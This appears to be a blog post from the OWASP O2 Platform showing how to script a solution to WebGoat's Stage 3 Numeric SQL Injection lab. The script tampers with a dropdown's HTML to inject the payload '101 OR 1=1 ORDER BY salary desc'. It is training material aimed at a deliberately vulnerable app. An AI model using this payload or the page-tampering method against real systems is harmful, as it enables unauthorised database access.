OWASP O2 Platform Blog

Solving WebGoat Sql Injection lesson (3rd one)

I had a request from an O2 user today (Thiago) who was trying to write an O2 script to solve the 3rd WebGoat lesson on Sql Injection

Here is what I did to debug and solve the problem:

– started the O2 Script ‘WebGoat BlackBox exploits’ (you can access it via the ‘OWASP Projects and Website (Custom O2)’ script (Button on the ‘Custom O2s’ Tab))
– clicked on ‘Download latest version’
– saved file to C:\O2\DemoData (after going to IE to add http://code.google.com/p/webgoat/ to the trusted zone so that IE would allow its download)
– unziped it (with 7z) and renamed the directory created to WebGoat, so that the full local path to it is C:\O2\DemoData\WebGoat\WebGoat-5.3_RC1 (this will match the path in the O2 Script)
– back into the O2 Script (the ‘WebGoat Blackbox exploits), I clicked on the 2nd button ‘Start Local Copy’
– Clicked on Open Main page (3rd button) – which worked ok
– Clicked on ‘Exploit Stage 1 Stored XSS OK’ to confirm that all is ok (in this version you need to over the XSS link to see the Javascript Alert box)
– Now i opened up the O2 Script ‘IE Automation’ and confirmed that I could access WebGoat from there using this script:

panel.clear();
var ie = panel.add_IE().silent(true);</pre>
ie.open("<a href="http://localhost:8080/webgoat/attack">http://localhost:8080/webgoat/attack</a>");

//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll

– next step is to debug the code sample provided by Thiago

panel.clear();
var ie = panel.add_IE().silent(true);</pre>
ie.open("<a href="http://172.16.234.138">http://172.16.234.138</a>");
ie.link("OWASP WebGoat version 5.3.x").click();
ie.link("Injection Flaws").click();
ie.link("LAB: SQL Injection").click();
ie.link("Stage 3: Numeric SQL Injection").click();

/*Login with larry user*/
ie.field("password").value("larry");
ie.button("Login").flash().click();

ie.selectLists()[1].options()[0].select().flash();
var payload = "101 OR 1=1 ORDER BY salary desc";

/*Change the id*/
/* I couldnt do this */

ie.button("ViewProfile").click();

return 0;

– And here is the code that works

panel.clear();
var ie = panel.add_IE().silent(true);</pre>
//ie.open("<a href="http://172.16.234.138">http://172.16.234.138</a>");
var webGoatUrl = "<a href="http://localhost.:8080/webgoat/attack">http://localhost.:8080/webgoat/attack</a>"; //DC: in my local environment this is where WebGoat's is running from
ie.openWithBasicAuthentication(webGoatUrl,"guest","guest"); // DC: you will need to do this once (if using the localhost. address (note the extra dot) which makes it compatible with webproxys like Fiddler)
ie.open(webGoatUrl);
//ie.link("OWASP WebGoat version 5.3.x").click(); // DC: this link doesn't exist in the <a href="http://localhost:8080/webgoat/attack">http://localhost:8080/webgoat/attack</a> page

ie.disableFlashing(); // DC: use this while developing the script since it will disable the flash() function (which takes up a couple precious seconds)
ie.link("Injection Flaws").click();

ie.link("LAB: SQL Injection").click();
ie.link("Stage 3: Numeric SQL Injection").click();

/*Login with larry user*/
ie.field("password").value("larry");
ie.button("Login").flash().click();
ie.selectLists()[1].options()[0].select();

//var payload = "AAAA";//DC use this value to test that it is working
var payload = "'101 OR 1=1 ORDER BY salary desc'"; //DC Payload (note the ' padding (required since the original HTML Attribute didn't have it)

var originalValue =  ie.selectLists()[1].outerHtml();       //DC: get the Html contents of the Select element
"Before payload the value of the select control is: {0}".debug(originalValue);  //DC: show it in LogViewer
var valueWithPayload  = originalValue.replace("101",payload);     //DC: create the payload to insert (using a rough search and replace)
ie.selectLists()[1].outerHtml(valueWithPayload);         //DC: inject the payload into the page
var updatedValue = ie.selectLists()[1].outerHtml();        //DC: get the new value
"After payload the value of the select control is: {0}".debug(updatedValue); //DC: and show it in the Log Viewer (just for debugging purposes

ie.button("ViewProfile").click();            //DC: click on the View Profile button

return ie.html().contains("You have completed Stage 3: Numeric SQL Injection.");//DC: quick check to make sure it worked (try modifing the payload to see how this will return false)

//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll
//O2Ref:Microsoft.mshtml.dll

December 3, 2010 - Posted by | IE Automation, WatiN

No comments yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: